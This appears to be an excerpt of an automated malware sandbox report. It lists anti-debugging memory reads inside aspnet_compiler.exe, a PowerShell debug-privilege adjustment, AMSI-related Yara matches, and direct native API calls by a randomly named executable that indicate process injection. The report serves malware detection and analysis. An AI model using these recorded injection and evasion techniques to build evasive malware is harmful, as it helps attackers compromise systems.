                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01787370 mov eax, dword ptr fs:[00000030h]12_2_01787370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01787370 mov eax, dword ptr fs:[00000030h]12_2_01787370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0185539D mov eax, dword ptr fs:[00000030h]12_2_0185539D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01779353 mov eax, dword ptr fs:[00000030h]12_2_01779353
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01779353 mov eax, dword ptr fs:[00000030h]12_2_01779353
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177D34C mov eax, dword ptr fs:[00000030h]12_2_0177D34C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177D34C mov eax, dword ptr fs:[00000030h]12_2_0177D34C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01777330 mov eax, dword ptr fs:[00000030h]12_2_01777330
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183C3CD mov eax, dword ptr fs:[00000030h]12_2_0183C3CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AF32A mov eax, dword ptr fs:[00000030h]12_2_017AF32A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183B3D0 mov ecx, dword ptr fs:[00000030h]12_2_0183B3D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183F3E6 mov eax, dword ptr fs:[00000030h]12_2_0183F3E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177C310 mov ecx, dword ptr fs:[00000030h]12_2_0177C310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A0310 mov ecx, dword ptr fs:[00000030h]12_2_017A0310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BA30B mov eax, dword ptr fs:[00000030h]12_2_017BA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BA30B mov eax, dword ptr fs:[00000030h]12_2_017BA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BA30B mov eax, dword ptr fs:[00000030h]12_2_017BA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018553FC mov eax, dword ptr fs:[00000030h]12_2_018553FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B63FF mov eax, dword ptr fs:[00000030h]12_2_017B63FF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E3F0 mov eax, dword ptr fs:[00000030h]12_2_0179E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E3F0 mov eax, dword ptr fs:[00000030h]12_2_0179E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E3F0 mov eax, dword ptr fs:[00000030h]12_2_0179E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180930B mov eax, dword ptr fs:[00000030h]12_2_0180930B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180930B mov eax, dword ptr fs:[00000030h]12_2_0180930B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180930B mov eax, dword ptr fs:[00000030h]12_2_0180930B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184132D mov eax, dword ptr fs:[00000030h]12_2_0184132D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184132D mov eax, dword ptr fs:[00000030h]12_2_0184132D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A3C0 mov eax, dword ptr fs:[00000030h]12_2_0178A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A3C0 mov eax, dword ptr fs:[00000030h]12_2_0178A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A3C0 mov eax, dword ptr fs:[00000030h]12_2_0178A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A3C0 mov eax, dword ptr fs:[00000030h]12_2_0178A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A3C0 mov eax, dword ptr fs:[00000030h]12_2_0178A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A3C0 mov eax, dword ptr fs:[00000030h]12_2_0178A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017883C0 mov eax, dword ptr fs:[00000030h]12_2_017883C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017883C0 mov eax, dword ptr fs:[00000030h]12_2_017883C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017883C0 mov eax, dword ptr fs:[00000030h]12_2_017883C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017883C0 mov eax, dword ptr fs:[00000030h]12_2_017883C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01855341 mov eax, dword ptr fs:[00000030h]12_2_01855341
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184A352 mov eax, dword ptr fs:[00000030h]12_2_0184A352
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B33A0 mov eax, dword ptr fs:[00000030h]12_2_017B33A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B33A0 mov eax, dword ptr fs:[00000030h]12_2_017B33A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180035C mov eax, dword ptr fs:[00000030h]12_2_0180035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180035C mov eax, dword ptr fs:[00000030h]12_2_0180035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180035C mov eax, dword ptr fs:[00000030h]12_2_0180035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180035C mov ecx, dword ptr fs:[00000030h]12_2_0180035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180035C mov eax, dword ptr fs:[00000030h]12_2_0180035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180035C mov eax, dword ptr fs:[00000030h]12_2_0180035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A15A9 mov eax, dword ptr fs:[00000030h]12_2_017A15A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BE59C mov eax, dword ptr fs:[00000030h]12_2_017BE59C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B4588 mov eax, dword ptr fs:[00000030h]12_2_017B4588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177758F mov eax, dword ptr fs:[00000030h]12_2_0177758F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177758F mov eax, dword ptr fs:[00000030h]12_2_0177758F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177758F mov eax, dword ptr fs:[00000030h]12_2_0177758F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01782582 mov eax, dword ptr fs:[00000030h]12_2_01782582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01782582 mov ecx, dword ptr fs:[00000030h]12_2_01782582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AA470 mov eax, dword ptr fs:[00000030h]12_2_017AA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AA470 mov eax, dword ptr fs:[00000030h]12_2_017AA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AA470 mov eax, dword ptr fs:[00000030h]12_2_017AA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01781460 mov eax, dword ptr fs:[00000030h]12_2_01781460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01781460 mov eax, dword ptr fs:[00000030h]12_2_01781460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01781460 mov eax, dword ptr fs:[00000030h]12_2_01781460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01781460 mov eax, dword ptr fs:[00000030h]12_2_01781460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01781460 mov eax, dword ptr fs:[00000030h]12_2_01781460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179F460 mov eax, dword ptr fs:[00000030h]12_2_0179F460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179F460 mov eax, dword ptr fs:[00000030h]12_2_0179F460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179F460 mov eax, dword ptr fs:[00000030h]12_2_0179F460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179F460 mov eax, dword ptr fs:[00000030h]12_2_0179F460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179F460 mov eax, dword ptr fs:[00000030h]12_2_0179F460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179F460 mov eax, dword ptr fs:[00000030h]12_2_0179F460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A245A mov eax, dword ptr fs:[00000030h]12_2_017A245A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177645D mov eax, dword ptr fs:[00000030h]12_2_0177645D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180A4B0 mov eax, dword ptr fs:[00000030h]12_2_0180A4B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178B440 mov eax, dword ptr fs:[00000030h]12_2_0178B440
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178B440 mov eax, dword ptr fs:[00000030h]12_2_0178B440
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178B440 mov eax, dword ptr fs:[00000030h]12_2_0178B440
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178B440 mov eax, dword ptr fs:[00000030h]12_2_0178B440
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178B440 mov eax, dword ptr fs:[00000030h]12_2_0178B440
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178B440 mov eax, dword ptr fs:[00000030h]12_2_0178B440
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BE443 mov eax, dword ptr fs:[00000030h]12_2_017BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BE443 mov eax, dword ptr fs:[00000030h]12_2_017BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BE443 mov eax, dword ptr fs:[00000030h]12_2_017BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BE443 mov eax, dword ptr fs:[00000030h]12_2_017BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BE443 mov eax, dword ptr fs:[00000030h]12_2_017BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BE443 mov eax, dword ptr fs:[00000030h]12_2_017BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BE443 mov eax, dword ptr fs:[00000030h]12_2_017BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BE443 mov eax, dword ptr fs:[00000030h]12_2_017BE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BA430 mov eax, dword ptr fs:[00000030h]12_2_017BA430
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177C427 mov eax, dword ptr fs:[00000030h]12_2_0177C427
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177E420 mov eax, dword ptr fs:[00000030h]12_2_0177E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177E420 mov eax, dword ptr fs:[00000030h]12_2_0177E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177E420 mov eax, dword ptr fs:[00000030h]12_2_0177E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018554DB mov eax, dword ptr fs:[00000030h]12_2_018554DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018294E0 mov eax, dword ptr fs:[00000030h]12_2_018294E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A340D mov eax, dword ptr fs:[00000030h]12_2_017A340D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B8402 mov eax, dword ptr fs:[00000030h]12_2_017B8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B8402 mov eax, dword ptr fs:[00000030h]12_2_017B8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B8402 mov eax, dword ptr fs:[00000030h]12_2_017B8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017804E5 mov ecx, dword ptr fs:[00000030h]12_2_017804E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B34B0 mov eax, dword ptr fs:[00000030h]12_2_017B34B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B44B0 mov ecx, dword ptr fs:[00000030h]12_2_017B44B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183F453 mov eax, dword ptr fs:[00000030h]12_2_0183F453
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017864AB mov eax, dword ptr fs:[00000030h]12_2_017864AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177B480 mov eax, dword ptr fs:[00000030h]12_2_0177B480
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0185547F mov eax, dword ptr fs:[00000030h]12_2_0185547F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01789486 mov eax, dword ptr fs:[00000030h]12_2_01789486
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01789486 mov eax, dword ptr fs:[00000030h]12_2_01789486
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01788770 mov eax, dword ptr fs:[00000030h]12_2_01788770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

                      HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi32_6364.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6364, type: MEMORYSTR
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtCreateMutant: Direct from: 0x774635CC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtWriteVirtualMemory: Direct from: 0x77462E3C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtMapViewOfSection: Direct from: 0x77462D1C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtResumeThread: Direct from: 0x774636AC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtProtectVirtualMemory: Direct from: 0x77462F9C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtSetInformationProcess: Direct from: 0x77462C5C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtSetInformationThread: Direct from: 0x774563F9
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtNotifyChangeKey: Direct from: 0x77463C2C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtQueryInformationProcess: Direct from: 0x77462C26
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtResumeThread: Direct from: 0x77462FBC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtReadFile: Direct from: 0x77462ADC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtQuerySystemInformation: Direct from: 0x77462DFC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtDelayExecution: Direct from: 0x77462DDC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtAllocateVirtualMemory: Direct from: 0x77463C9C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtCreateUserProcess: Direct from: 0x7746371C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtWriteVirtualMemory: Direct from: 0x7746490C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtAllocateVirtualMemory: Direct from: 0x774648EC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtQuerySystemInformation: Direct from: 0x774648CC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtReadVirtualMemory: Direct from: 0x77462E8C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtCreateKey: Direct from: 0x77462C6C
